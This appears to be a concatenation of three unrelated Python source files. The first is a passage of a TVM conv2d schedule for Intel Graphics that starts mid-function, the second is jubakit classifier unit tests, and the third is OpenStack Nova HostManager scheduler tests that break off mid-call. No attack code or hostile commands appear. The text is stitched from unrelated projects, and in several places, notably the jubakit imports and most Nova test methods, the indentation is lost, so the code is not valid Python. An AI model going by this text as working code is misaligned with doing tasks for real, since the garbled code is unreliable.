    s[temp_W].bind(zi, thread_z)
    s[temp_W].bind(yi, thread_y)
    s[temp_W].bind(xi, thread_x)
    s[temp_W].storage_align(s[temp_W].op.axis[2], 16, 0)
    #schedule kernel
    # schedule kernel_L
    # NOTE(review): conv's op tag does not appear to be set in the NCHWc
    # declaration, so the "2_14" branch looks unreachable here -- confirm.
    if "2_14" in s[conv].op.tag:
        s[kernel_L].compute_at(s[conv_L], ry)
    else:
        s[kernel_L].compute_at(s[conv_L], rx)
    # schedule output
    if output.op in s.outputs:
        out = output
    else:
        # Fused into a later stage: inline the unpack and schedule the
        # final consumer instead.
        s[output].compute_inline()
        out = s.outputs[0]
    _, co, h, w = s[out].op.axis
    tile_and_bind3d(s, out, w, h, co, 4, 8, 8)
@conv2d.register(["intel_graphics"])
def decl_conv2d(data, kernel, stride, padding, dilation, layout='NCHW', out_dtype='float32'):
    """Conv2D operator for Intel Graphics backend.

    Parameters
    ----------
    data : tvm.Tensor
        4-D with shape [batch, in_channel, in_height, in_width]
    kernel : tvm.Tensor
        4-D with shape [num_filter, in_channel, filter_height, filter_width]
    stride : int or a list/tuple of two ints
        stride size, or [stride_height, stride_width]
    padding : int or a list/tuple of two ints
        padding size, or [pad_height, pad_width]
    layout : str
        layout of data

    Returns
    -------
    output : tvm.Tensor
        4-D with shape [batch, out_channel, out_height, out_width]
    """
    assert layout == 'NCHW', "only support NCHW convolution on intel gpu"
    assert data.shape[0].value == 1, "only support batch size=1 convolution on intel gpu"
    assert data.dtype == kernel.dtype, "Do not support inputs with different data types now."
    # The output dtype always follows the input dtype; the out_dtype argument
    # is ignored (kept for interface compatibility).
    out_dtype = data.dtype
    # FIX: removed dead locals (HPAD/WPAD from get_pad_tuple, kernel_shape,
    # HSTR/WSTR) that were computed and never used -- padding and stride are
    # normalized inside _decl_cl_spatialpack.
    return _decl_cl_spatialpack(data, kernel, stride, padding, layout, out_dtype)
@generic.schedule_conv2d_nchw.register(["intel_graphics"])
def schedule_conv2d_nchw(outs):
    """Schedule for conv2d_nchw for Intel Graphics

    Parameters
    ----------
    outs: Array of Tensor
        The computation graph description of conv2d_nchw
        in the format of an array of tensors.

    Returns
    -------
    s: Schedule
        The computation schedule for conv2d_nchw.
    """
    outs = [outs] if isinstance(outs, tvm.tensor.Tensor) else outs
    s = tvm.create_schedule([x.op for x in outs])
    scheduled_ops = []

    def traverse(op):
        """inline all one-to-one-mapping operators except the last stage (output)"""
        if tag.is_broadcast(op.tag):
            if op not in s.outputs:
                s[op].compute_inline()
            for tensor in op.input_tensors:
                # Recurse into producers that have not been visited yet;
                # placeholder ops (no inputs) are skipped.
                if tensor.op.input_tensors and tensor.op not in scheduled_ops:
                    traverse(tensor.op)
        if 'conv2d' in op.tag:
            _schedule_cl_spatialpack(s, op)
        scheduled_ops.append(op)

    traverse(outs[0].op)
    return s
def _decl_cl_spatialpack(data, kernel, stride, padding, layout, out_dtype='float16'):
    """Declare the spatial-pack conv2d compute for a plain OIHW kernel.

    Unlike the NCHWc variant, the 4-D kernel is packed on the fly into a
    5-D kernel_vec (nv=16 filters per chunk, rounding num_filter up if
    needed). Returns the unpacked 4-D NCHW output tensor tagged 'conv2d'.
    """
    batch, in_channel, in_height, in_width = [util.get_const_int(x) for x in data.shape]
    num_filter, channel, kernel_h, kernel_w = [util.get_const_int(x) for x in kernel.shape]
    pad_top, pad_left, pad_down, pad_right = get_pad_tuple(padding, kernel)
    if isinstance(stride, (tuple, list)):
        stride_h, stride_w = stride
    else:
        stride_h, stride_w = stride, stride
    out_channel = num_filter
    out_height = simplify((in_height - kernel_h + pad_top + pad_down) // stride_h + 1)
    out_width = simplify((in_width - kernel_w + pad_left + pad_right) // stride_w + 1)
    oshape = (batch, out_channel, out_height, out_width)
    rc = tvm.reduce_axis((0, in_channel), name='rc')
    ry = tvm.reduce_axis((0, kernel_h), name='ry')
    rx = tvm.reduce_axis((0, kernel_w), name='rx')
    # Output tile sizes (block_h x block_w) per workload class; these magic
    # numbers are presumably hand-tuned for Intel Graphics -- confirm.
    block_w = 1
    block_h = 1
    if stride_h == 2:
        if num_filter + kernel_h == 515:
            block_h = 4
            block_w = 4
        else:
            block_h = 4
            block_w = 5
    elif kernel_h == 3:
        if num_filter == 512:
            block_h = 2
            block_w = 7
        else:
            block_h = 2
            block_w = 14
    elif kernel_h == 7 and padding == 3 and stride == 1:
        block_h = 3
        block_w = 4
    else:
        block_h = 1
        block_w = 16
    # The tile sizes are handed to the schedule via op attrs.
    attrs = {'block_h': block_h, 'block_w' : block_w}
    # Round the compute extent up to a whole number of blocks.
    c_h = out_height
    c_w = out_width
    if not out_width % block_w == 0:
        c_w = (out_width // block_w + 1) * block_w
    if not out_height % block_h == 0:
        c_h = (out_height // block_h + 1) * block_h
    # Pad beyond the normal conv padding so every block reads valid data.
    pad_before = [0, 0, pad_top, pad_left]
    pad_after = [0, 0, pad_down + c_h - block_h, pad_right + c_w - block_w]
    temp = pad(data, pad_before, pad_after, name="pad_temp")
    # Round the filter count up to a multiple of the packing width nv.
    nv = 16
    if not num_filter % nv == 0:
        num_filter = (num_filter // nv + 1) * nv
        out_channel = num_filter
    cshape = (batch, out_channel // nv, c_h, c_w, nv)
    kvshape = (num_filter // nv, channel, kernel_h, kernel_w, nv)
    # Pack the OIHW kernel into chunks of nv filters.
    kernel_vec = tvm.compute(
        kvshape,
        lambda co, ci, kh, kw, vc:
            kernel[co*nv + vc][ci][kh][kw], name='kernel_vec')
    conv = tvm.compute(
        cshape,
        lambda nn, ff, yy, xx, vc:\
            tvm.sum(
                temp[nn, rc, yy * stride_h + ry, xx * stride_w + rx].astype(out_dtype) *
                kernel_vec[ff, rc, ry, rx, vc].astype(out_dtype),
                axis=[rc, ry, rx]), name='conv', attrs=attrs)
    # Unpack the NCHWc accumulation buffer back to NCHW.
    output = tvm.compute(
        oshape,
        lambda nn, ff, yy, xx:
            conv[nn][ff//nv][yy][xx][ff%nv],
        name='output_unpack', tag='conv2d')
    return output
def _schedule_cl_spatialpack(s, op):
    """Schedule the OIHW spatial-pack conv2d compute.

    `op` is the 'output_unpack' stage; its producer chain is
    conv <- (pad_temp, kernel_vec <- kernel). The on-the-fly kernel
    packing (kernel_vec) is inlined into its consumer.
    """
    output = op.output(0)
    _, _, out_height, out_width = [util.get_const_int(x) for x in output.shape]
    conv = op.input_tensors[0]
    temp = s[conv].op.input_tensors[0]
    kernel_vec = s[conv].op.input_tensors[1]
    kernel = s[kernel_vec].op.input_tensors[0]
    # Cache padded input per-warp and accumulate conv locally; the packed
    # kernel is staged through a local cache feeding the accumulator.
    temp_W = s.cache_read(temp, "warp", [conv])
    conv_L = s.cache_write(conv, "local")
    kernel_L = s.cache_read(kernel_vec, "local", [conv_L])
    _, in_channel, temp_h, temp_w = [util.get_const_int(x) for x in temp.shape]
    # Tile sizes chosen by _decl_cl_spatialpack.
    attrs = s[conv].op.attrs
    OUTPUT_BLOCK_HEIGHT = attrs['block_h']
    OUTPUT_BLOCK_WIDTH = attrs['block_w']
    # schedule conv
    z_factor = 1
    y_factor = 1
    x_factor = 16
    thread_z = tvm.thread_axis((0, z_factor), "threadIdx.z")
    thread_y = tvm.thread_axis((0, y_factor), "threadIdx.y")
    thread_x = tvm.thread_axis((0, x_factor), "threadIdx.x")
    _, co, oh, ow, vc = s[conv].op.axis
    ooh, ioh = s[conv].split(oh, factor=OUTPUT_BLOCK_HEIGHT)
    oow, iow = s[conv].split(ow, factor=OUTPUT_BLOCK_WIDTH)
    s[conv].reorder(_, co, ooh, oow, vc, ioh, iow)
    coo, coi = s[conv].split(co, nparts=1)
    ooho, oohi = s[conv].split(ooh, factor=z_factor)
    oowo, oowi = s[conv].split(oow, factor=y_factor)
    vco, vci = s[conv].split(vc, factor=x_factor)
    s[conv].reorder(_, coo, vco, ooho, oowo, coi, oohi, oowi, vci, ioh, iow)
    s[conv].bind(oohi, thread_z)
    s[conv].bind(oowi, thread_y)
    s[conv].bind(vci, thread_x)
    s[conv].bind(ooho, tvm.thread_axis("blockIdx.z"))
    s[conv].bind(oowo, tvm.thread_axis("blockIdx.y"))
    s[conv].bind(coi, tvm.thread_axis("blockIdx.x"))
    # schedule conv_L
    s[conv_L].compute_at(s[conv], vci)
    i, oc, h, w, vc = s[conv_L].op.axis
    rc, ry, rx = s[conv_L].op.reduce_axis
    s[conv_L].reorder(i, oc, rc, ry, rx, vc, h, w)
    s[temp_W].compute_at(s[conv_L], rc)
    # Unroll the kernel-window loops except for the 7-wide case.
    if kernel.shape[3].value != 7:
        s[conv_L].unroll(ry)
        s[conv_L].unroll(rx)
    # schedule temp
    _, ci, h, w = s[temp].op.axis
    tile_and_bind3d(s, temp, ci, h, w, 1, 16, 16)
    # schedule temp_W
    _, ci, h, w = s[temp_W].op.axis
    zo, zi = s[temp_W].split(ci, 1)
    yo, yi = s[temp_W].split(h, 1)
    xo, xi = s[temp_W].split(w, 16)
    s[temp_W].reorder(zo, yo, xo, zi, yi, xi)
    s[temp_W].bind(zi, thread_z)
    s[temp_W].bind(yi, thread_y)
    s[temp_W].bind(xi, thread_x)
    s[temp_W].storage_align(s[temp_W].op.axis[2], 16, 0)
    # The kernel packing stage is folded into its consumer (kernel_L).
    s[kernel_vec].compute_inline()
    # schedule kernel_L
    # NOTE(review): conv's op tag does not appear to be set in the
    # declaration, so the "2_14" branch looks unreachable here -- confirm.
    if "2_14" in s[conv].op.tag:
        s[kernel_L].compute_at(s[conv_L], ry)
    else:
        s[kernel_L].compute_at(s[conv_L], rx)
    # schedule output
    if output.op in s.outputs:
        out = output
    else:
        # Fused into a later stage: inline the unpack and schedule the
        # final consumer instead.
        s[output].compute_inline()
        out = s.outputs[0]
    _, co, h, w = s[out].op.axis
    tile_and_bind3d(s, out, w, h, co, 4, 8, 8)
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from unittest import TestCase
try:
import numpy as np
from scipy.sparse import csr_matrix
except ImportError:
pass
from jubakit.classifier import Schema, Dataset, Classifier, Config
from jubakit.compat import *
from . import requireSklearn, requireEmbedded
from .stub import *
class SchemaTest(TestCase):
  """Tests for the classifier Schema: label extraction and validation."""
  def test_simple(self):
    schema = Schema({
      'k1': Schema.STRING,
      'k2': Schema.LABEL,
    })
    # Labeled record: the LABEL key becomes the label, the rest the datum.
    (label, datum) = schema.transform({'k1': 'abc', 'k2': 'def'})
    self.assertEqual('def', label)
    self.assertEqual({'k1': 'abc'}, dict(datum.string_values))
    # Unlabeled record: a None label passes through untouched.
    (label, datum) = schema.transform({'k1': 'foo', 'k2': None})  # unlabeled data
    self.assertEqual(None, label)
    self.assertEqual({'k1': 'foo'}, dict(datum.string_values))
  def test_without_label(self):
    # A schema is free to declare no LABEL column at all.
    Schema({'k1': Schema.STRING})
  def test_illegal_label(self):
    # Declaring two LABEL columns is rejected.
    self.assertRaises(RuntimeError, Schema, {
      'k1': Schema.LABEL,
      'k2': Schema.LABEL
    })
    # Using LABEL as the fallback type is rejected as well.
    self.assertRaises(RuntimeError, Schema, {'k1': Schema.LABEL}, Schema.LABEL)
class DatasetTest(TestCase):
  """Tests for classifier Dataset construction, iteration and conversion."""
  def test_simple(self):
    loader = StubLoader()
    schema = Schema({'v': Schema.LABEL})
    ds = Dataset(loader, schema)
    # 'v' is consumed as the label, so every datum must be empty.
    for (idx, (label, d)) in ds:
      self.assertEqual(unicode_t(idx+1), label)
      self.assertEqual(0, len(d.string_values))
      self.assertEqual(0, len(d.num_values))
      self.assertEqual(0, len(d.binary_values))
    self.assertEqual(['1','2','3'], list(ds.get_labels()))
  def test_predict(self):
    loader = StubLoader()
    # No schema given: the dataset is for prediction and values are numeric.
    dataset = Dataset(loader) # predict
    self.assertEqual(['v', 1.0], dataset[0][1].num_values[0])
  def test_get_labels(self):
    loader = StubLoader()
    schema = Schema({'v': Schema.LABEL})
    ds = Dataset(loader, schema)
    self.assertEqual(['1', '2', '3'], list(ds.get_labels()))
  def test_invalid_get_labels(self):
    loader = StubLoader()
    schema = Schema({'v': Schema.LABEL})
    # Non-static (streaming) datasets cannot enumerate their labels.
    ds = Dataset(loader, schema, static=False)
    # get_labels returns generator; as generator will be evaluated
    # when actually iterating over it, pass it to list().
    self.assertRaises(RuntimeError, list, ds.get_labels())
  @requireSklearn
  def test_from_data(self):
    # load from array format
    ds = Dataset.from_data(
      [ [10,20,30], [20,10,50], [40,10,30] ], # data
      [ 0, 1, 0 ], # labels
      ['k1', 'k2', 'k3'], # feature_names
      ['pos', 'neg'], # label_names
    )
    expected_labels = ['pos', 'neg', 'pos']
    expected_k1s = [10, 20, 40]
    actual_labels = []
    actual_k1s = []
    for (idx, (label, d)) in ds:
      actual_labels.append(label)
      actual_k1s.append(dict(d.num_values)['k1'])
    self.assertEqual(expected_labels, actual_labels)
    self.assertEqual(expected_k1s, actual_k1s)
    # load from scipy.sparse format
    ds = Dataset.from_data(
      self._create_matrix(), # data
      [ 0, 1, 0 ], # labels
      [ 'k1', 'k2', 'k3'], # feature_names
      [ 'pos', 'neg'], # label_names
    )
    expected_labels = ['pos', 'neg', 'pos']
    # k1 is absent in row 1: zero entries of the sparse matrix are skipped.
    expected_k1s = [1, None, 4]
    expected_k3s = [2, 3, 6]
    actual_labels = []
    actual_k1s = []
    actual_k3s = []
    for (idx, (label, d)) in ds:
      actual_labels.append(label)
      actual_k1s.append(dict(d.num_values).get('k1', None))
      actual_k3s.append(dict(d.num_values).get('k3', None))
    self.assertEqual(expected_labels, actual_labels)
    self.assertEqual(expected_k1s, actual_k1s)
    self.assertEqual(expected_k3s, actual_k3s)
  def test_from_array(self):
    ds = Dataset.from_array(
      [ [10,20,30], [20,10,50], [40,10,30] ], # data
      [ 0, 1, 0 ], # labels
      ['k1', 'k2', 'k3'], # feature_names
      ['pos', 'neg'], # label_names
    )
    expected_labels = ['pos', 'neg', 'pos']
    expected_k1s = [10, 20, 40]
    actual_labels = []
    actual_k1s = []
    for (idx, (label, d)) in ds:
      actual_labels.append(label)
      actual_k1s.append(dict(d.num_values)['k1'])
    self.assertEqual(expected_labels, actual_labels)
    self.assertEqual(expected_k1s, actual_k1s)
  def test_from_array_without_label(self):
    ds = Dataset.from_array(
      [ [10,20,30], [20,10,50], [40,10,30] ], # data
      None, # labels
      ['k1', 'k2', 'k3'], # feature_names
      ['pos', 'neg'], # label_names
    )
    # No labels supplied: every record comes back unlabeled.
    expected_labels = [None, None, None]
    expected_k1s = [10, 20, 40]
    actual_labels = []
    actual_k1s = []
    for (idx, (label, d)) in ds:
      actual_labels.append(label)
      actual_k1s.append(dict(d.num_values)['k1'])
    self.assertEqual(expected_labels, actual_labels)
    self.assertEqual(expected_k1s, actual_k1s)
  @requireSklearn
  def test_from_matrix(self):
    ds = Dataset.from_matrix(
      self._create_matrix(), # data
      [ 0, 1, 0 ], # labels
      [ 'k1', 'k2', 'k3'], # feature_names
      [ 'pos', 'neg'], # label_names
    )
    expected_labels = ['pos', 'neg', 'pos']
    expected_k1s = [1,None,4]
    expected_k3s = [2,3,6]
    actual_labels = []
    actual_k1s = []
    actual_k3s = []
    for (idx, (label, d)) in ds:
      actual_labels.append(label)
      actual_k1s.append(dict(d.num_values).get('k1', None))
      actual_k3s.append(dict(d.num_values).get('k3', None))
    self.assertEqual(expected_labels, actual_labels)
    self.assertEqual(expected_k1s, actual_k1s)
    self.assertEqual(expected_k3s, actual_k3s)
  def _create_matrix(self):
    """
    Create a sparse matrix:
    [[1, 0, 2],
     [0, 0, 3],
     [4, 5, 6]]
    """
    row = np.array([0, 0, 1, 2, 2, 2])
    col = np.array([0, 2, 2, 0, 1, 2])
    data = np.array([1, 2, 3, 4, 5, 6])
    return csr_matrix((data, (row, col)), shape=(3, 3))
class ClassifierTest(TestCase):
  """Smoke tests for the Classifier service wrapper."""
  def test_simple(self):
    # Constructing a Classifier with default options must not raise.
    classifier = Classifier()
  @requireEmbedded
  def test_embedded(self):
    # Embedded (in-process) Jubatus must start with the default config.
    classifier = Classifier.run(Config(), embedded=True)
class ConfigTest(TestCase):
  """Tests for classifier Config defaults and per-method parameters."""
  def test_simple(self):
    cfg = Config()
    # AROW is the default classification method.
    self.assertEqual('AROW', cfg['method'])
  def test_methods(self):
    cfg = Config()
    self.assertIsInstance(cfg.methods(), list)
  def test_default(self):
    # Config.default() mirrors the no-argument constructor.
    self.assertEqual('AROW', Config.default()['method'])
  def test_method_param(self):
    # PA takes no parameters at all.
    self.assertNotIn('parameter', Config(method='PA'))
    # PA1 carries a regularization weight.
    self.assertIn('regularization_weight', Config(method='PA1')['parameter'])
    # The nearest-neighbor-based methods all share the same parameter.
    for method in ('NN', 'cosine', 'euclidean'):
      self.assertIn('nearest_neighbor_num', Config(method=method)['parameter'])
  def test_invalid_method(self):
    self.assertRaises(RuntimeError, Config._default_parameter, 'invalid_method')
| |
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For HostManager
"""
import collections
import contextlib
import datetime
import mock
from oslo_serialization import jsonutils
from oslo_utils import versionutils
import six
import nova
from nova.compute import task_states
from nova.compute import vm_states
from nova import context as nova_context
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.pci import stats as pci_stats
from nova.scheduler import filters
from nova.scheduler import host_manager
from nova import test
from nova.tests import fixtures
from nova.tests.unit import fake_instance
from nova.tests.unit import matchers
from nova.tests.unit.scheduler import fakes
from nova.tests import uuidsentinel as uuids
class FakeFilterClass1(filters.BaseHostFilter):
    # Minimal filter stub; tests replace _filter_one to observe filtering.
    def host_passes(self, host_state, filter_properties):
        pass
class FakeFilterClass2(filters.BaseHostFilter):
    # Second filter stub, registered as available but not enabled by default.
    def host_passes(self, host_state, filter_properties):
        pass
class HostManagerTestCase(test.NoDBTestCase):
"""Test case for HostManager class."""
    @mock.patch.object(host_manager.HostManager, '_init_instance_info')
    @mock.patch.object(host_manager.HostManager, '_init_aggregates')
    def setUp(self, mock_init_agg, mock_init_inst):
        # Instance-info and aggregate initialization are patched out so a
        # HostManager can be built without hitting the database.
        super(HostManagerTestCase, self).setUp()
        self.flags(available_filters=[
            __name__ + '.FakeFilterClass1', __name__ + '.FakeFilterClass2'],
            group='filter_scheduler')
        self.flags(enabled_filters=['FakeFilterClass1'],
                   group='filter_scheduler')
        self.host_manager = host_manager.HostManager()
        cell = uuids.cell
        # fake_host1..4 each on a single node, plus one multi-node host
        # ('fake_multihost' on fake-node1..4) — eight HostStates total.
        self.fake_hosts = [host_manager.HostState('fake_host%s' % x,
                'fake-node', cell) for x in range(1, 5)]
        self.fake_hosts += [host_manager.HostState('fake_multihost',
                'fake-node%s' % x, cell) for x in range(1, 5)]
        self.useFixture(fixtures.SpawnIsSynchronousFixture())
def test_load_filters(self):
filters = self.host_manager._load_filters()
self.assertEqual(filters, ['FakeFilterClass1'])
def test_refresh_cells_caches(self):
ctxt = nova_context.RequestContext('fake', 'fake')
# Loading the non-cell0 mapping from the base test class.
self.assertEqual(1, len(self.host_manager.enabled_cells))
self.assertEqual(1, len(self.host_manager.cells))
# Creating cell mappings for mocking the list of cell_mappings obtained
# so that the refreshing mechanism can be properly tested. This will in
# turn ignore the loaded cell mapping from the base test case setup.
cell_uuid1 = uuids.cell1
cell_mapping1 = objects.CellMapping(context=ctxt,
uuid=cell_uuid1,
database_connection='fake:///db1',
transport_url='fake:///mq1',
disabled=False)
cell_uuid2 = uuids.cell2
cell_mapping2 = objects.CellMapping(context=ctxt,
uuid=cell_uuid2,
database_connection='fake:///db2',
transport_url='fake:///mq2',
disabled=True)
cell_uuid3 = uuids.cell3
cell_mapping3 = objects.CellMapping(context=ctxt,
uuid=cell_uuid3,
database_connection='fake:///db3',
transport_url='fake:///mq3',
disabled=False)
cells = [cell_mapping1, cell_mapping2, cell_mapping3]
with mock.patch('nova.objects.CellMappingList.get_all',
return_value=cells) as mock_cm:
self.host_manager.refresh_cells_caches()
mock_cm.assert_called_once()
self.assertEqual(2, len(self.host_manager.enabled_cells))
self.assertEqual(cell_uuid3, self.host_manager.enabled_cells[1].uuid)
self.assertEqual(3, len(self.host_manager.cells))
self.assertEqual(cell_uuid2, self.host_manager.cells[1].uuid)
def test_refresh_cells_caches_except_cell0(self):
ctxt = nova_context.RequestContext('fake-user', 'fake_project')
cell_uuid0 = objects.CellMapping.CELL0_UUID
cell_mapping0 = objects.CellMapping(context=ctxt,
uuid=cell_uuid0,
database_connection='fake:///db1',
transport_url='fake:///mq1')
cells = objects.CellMappingList(cell_mapping0)
# Mocking the return value of get_all cell_mappings to return only
# the cell0 mapping to check if its filtered or not.
with mock.patch('nova.objects.CellMappingList.get_all',
return_value=cells) as mock_cm:
self.host_manager.refresh_cells_caches()
mock_cm.assert_called_once()
self.assertEqual(0, len(self.host_manager.cells))
@mock.patch.object(nova.objects.InstanceList, 'get_by_filters')
@mock.patch.object(nova.objects.ComputeNodeList, 'get_all')
def test_init_instance_info_batches(self, mock_get_all,
mock_get_by_filters):
cn_list = objects.ComputeNodeList()
for num in range(22):
host_name = 'host_%s' % num
cn_list.objects.append(objects.ComputeNode(host=host_name))
mock_get_all.return_value = cn_list
self.host_manager._init_instance_info()
self.assertEqual(mock_get_by_filters.call_count, 3)
    @mock.patch.object(nova.objects.InstanceList, 'get_by_filters')
    @mock.patch.object(nova.objects.ComputeNodeList, 'get_all')
    def test_init_instance_info(self, mock_get_all,
                                mock_get_by_filters):
        # Instances must be grouped per compute host discovered via get_all.
        cn1 = objects.ComputeNode(host='host1')
        cn2 = objects.ComputeNode(host='host2')
        inst1 = objects.Instance(host='host1', uuid=uuids.instance_1)
        inst2 = objects.Instance(host='host1', uuid=uuids.instance_2)
        inst3 = objects.Instance(host='host2', uuid=uuids.instance_3)
        mock_get_all.return_value = objects.ComputeNodeList(objects=[cn1, cn2])
        mock_get_by_filters.return_value = objects.InstanceList(
            objects=[inst1, inst2, inst3])
        hm = self.host_manager
        hm._instance_info = {}
        hm._init_instance_info()
        # One entry per host, each holding only that host's instances.
        self.assertEqual(len(hm._instance_info), 2)
        fake_info = hm._instance_info['host1']
        self.assertIn(uuids.instance_1, fake_info['instances'])
        self.assertIn(uuids.instance_2, fake_info['instances'])
        self.assertNotIn(uuids.instance_3, fake_info['instances'])
        # A single non-deleted query covering both hosts is expected.
        exp_filters = {'deleted': False, 'host': [u'host1', u'host2']}
        mock_get_by_filters.assert_called_once_with(mock.ANY, exp_filters)
@mock.patch.object(nova.objects.InstanceList, 'get_by_filters')
@mock.patch.object(nova.objects.ComputeNodeList, 'get_all')
def test_init_instance_info_compute_nodes(self, mock_get_all,
mock_get_by_filters):
cn1 = objects.ComputeNode(host='host1')
cn2 = objects.ComputeNode(host='host2')
inst1 = objects.Instance(host='host1', uuid=uuids.instance_1)
inst2 = objects.Instance(host='host1', uuid=uuids.instance_2)
inst3 = objects.Instance(host='host2', uuid=uuids.instance_3)
cell = objects.CellMapping(database_connection='',
target_url='')
mock_get_by_filters.return_value = objects.InstanceList(
objects=[inst1, inst2, inst3])
hm = self.host_manager
hm._instance_info = {}
hm._init_instance_info({cell: [cn1, cn2]})
self.assertEqual(len(hm._instance_info), 2)
fake_info = hm._instance_info['host1']
self.assertIn(uuids.instance_1, fake_info['instances'])
self.assertIn(uuids.instance_2, fake_info['instances'])
self.assertNotIn(uuids.instance_3, fake_info['instances'])
exp_filters = {'deleted': False, 'host': [u'host1', u'host2']}
mock_get_by_filters.assert_called_once_with(mock.ANY, exp_filters)
# should not be called if the list of nodes was passed explicitly
self.assertFalse(mock_get_all.called)
def test_enabled_filters(self):
enabled_filters = self.host_manager.enabled_filters
self.assertEqual(1, len(enabled_filters))
self.assertIsInstance(enabled_filters[0], FakeFilterClass1)
    @mock.patch.object(host_manager.HostManager, '_init_instance_info')
    @mock.patch.object(objects.AggregateList, 'get_all')
    def test_init_aggregates_no_aggs(self, agg_get_all, mock_init_info):
        # No aggregates in the DB: both aggregate caches start empty.
        agg_get_all.return_value = []
        self.host_manager = host_manager.HostManager()
        self.assertEqual({}, self.host_manager.aggs_by_id)
        self.assertEqual({}, self.host_manager.host_aggregates_map)
    @mock.patch.object(host_manager.HostManager, '_init_instance_info')
    @mock.patch.object(objects.AggregateList, 'get_all')
    def test_init_aggregates_one_agg_no_hosts(self, agg_get_all,
                                              mock_init_info):
        # An aggregate with no hosts is cached by id, but no host mapping
        # entries are created.
        fake_agg = objects.Aggregate(id=1, hosts=[])
        agg_get_all.return_value = [fake_agg]
        self.host_manager = host_manager.HostManager()
        self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
        self.assertEqual({}, self.host_manager.host_aggregates_map)
    @mock.patch.object(host_manager.HostManager, '_init_instance_info')
    @mock.patch.object(objects.AggregateList, 'get_all')
    def test_init_aggregates_one_agg_with_hosts(self, agg_get_all,
                                                mock_init_info):
        # A member host is mapped to the set of its aggregate ids.
        fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
        agg_get_all.return_value = [fake_agg]
        self.host_manager = host_manager.HostManager()
        self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
        self.assertEqual({'fake-host': set([1])},
                         self.host_manager.host_aggregates_map)
def test_update_aggregates(self):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
self.host_manager.update_aggregates([fake_agg])
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([1])},
self.host_manager.host_aggregates_map)
def test_update_aggregates_remove_hosts(self):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
self.host_manager.update_aggregates([fake_agg])
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([1])},
self.host_manager.host_aggregates_map)
# Let's remove the host from the aggregate and update again
fake_agg.hosts = []
self.host_manager.update_aggregates([fake_agg])
self.assertEqual({1: fake_agg}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([])},
self.host_manager.host_aggregates_map)
def test_delete_aggregate(self):
fake_agg = objects.Aggregate(id=1, hosts=['fake-host'])
self.host_manager.host_aggregates_map = collections.defaultdict(
set, {'fake-host': set([1])})
self.host_manager.aggs_by_id = {1: fake_agg}
self.host_manager.delete_aggregate(fake_agg)
self.assertEqual({}, self.host_manager.aggs_by_id)
self.assertEqual({'fake-host': set([])},
self.host_manager.host_aggregates_map)
    def test_choose_host_filters_not_found(self):
        # Requesting a filter class that was never registered raises.
        self.assertRaises(exception.SchedulerHostFilterNotFound,
                          self.host_manager._choose_host_filters,
                          'FakeFilterClass3')
def test_choose_host_filters(self):
# Test we return 1 correct filter object
host_filters = self.host_manager._choose_host_filters(
['FakeFilterClass2'])
self.assertEqual(1, len(host_filters))
self.assertIsInstance(host_filters[0], FakeFilterClass2)
    def _mock_get_filtered_hosts(self, info):
        # Stub FakeFilterClass1._filter_one to record every (host,
        # filter_properties) pair it sees and accept all hosts, so tests can
        # verify exactly what reached the filter stage.
        info['got_objs'] = []
        info['got_fprops'] = []
        def fake_filter_one(_self, obj, filter_props):
            info['got_objs'].append(obj)
            info['got_fprops'].append(filter_props)
            return True
        self.stub_out(__name__ + '.FakeFilterClass1._filter_one',
                      fake_filter_one)
    def _verify_result(self, info, result, filters=True):
        # Every filter invocation must have seen the same request spec.
        for x in info['got_fprops']:
            self.assertEqual(x, info['expected_fprops'])
        # When the filter path ran (filters=True, i.e. no force short
        # circuit), the filter must have seen exactly the expected hosts.
        if filters:
            self.assertEqual(set(info['expected_objs']), set(info['got_objs']))
        self.assertEqual(set(info['expected_objs']), set(result))
    def test_get_filtered_hosts(self):
        # With no ignore/force constraints every host reaches the filters.
        fake_properties = objects.RequestSpec(ignore_hosts=[],
                                              instance_uuid=uuids.instance,
                                              force_hosts=[],
                                              force_nodes=[])
        info = {'expected_objs': self.fake_hosts,
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result)
    def test_get_filtered_hosts_with_requested_destination(self):
        # A requested_destination pre-restricts candidates to the matching
        # host/node pair before the filters run.
        dest = objects.Destination(host='fake_host1', node='fake-node')
        fake_properties = objects.RequestSpec(requested_destination=dest,
                                              ignore_hosts=[],
                                              instance_uuid=uuids.fake_uuid1,
                                              force_hosts=[],
                                              force_nodes=[])
        info = {'expected_objs': [self.fake_hosts[0]],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result)
    def test_get_filtered_hosts_with_wrong_requested_destination(self):
        # A destination matching no known host filters everything out.
        dest = objects.Destination(host='dummy', node='fake-node')
        fake_properties = objects.RequestSpec(requested_destination=dest,
                                              ignore_hosts=[],
                                              instance_uuid=uuids.fake_uuid1,
                                              force_hosts=[],
                                              force_nodes=[])
        info = {'expected_objs': [],
                'expected_fprops': fake_properties}
        self._mock_get_filtered_hosts(info)
        result = self.host_manager.get_filtered_hosts(self.fake_hosts,
                fake_properties)
        self._verify_result(info, result)
    def test_get_filtered_hosts_with_ignore(self):
        # Hosts named in ignore_hosts (including every node of the ignored
        # multi-node host) are dropped before filtering.
        fake_properties = objects.RequestSpec(
            instance_uuid=uuids.instance,
            ignore_hosts=['fake_host1', 'fake_host3',
                          'fake_host5', 'fake_multihost'],
            force_hosts=[],
            force_nodes=[])
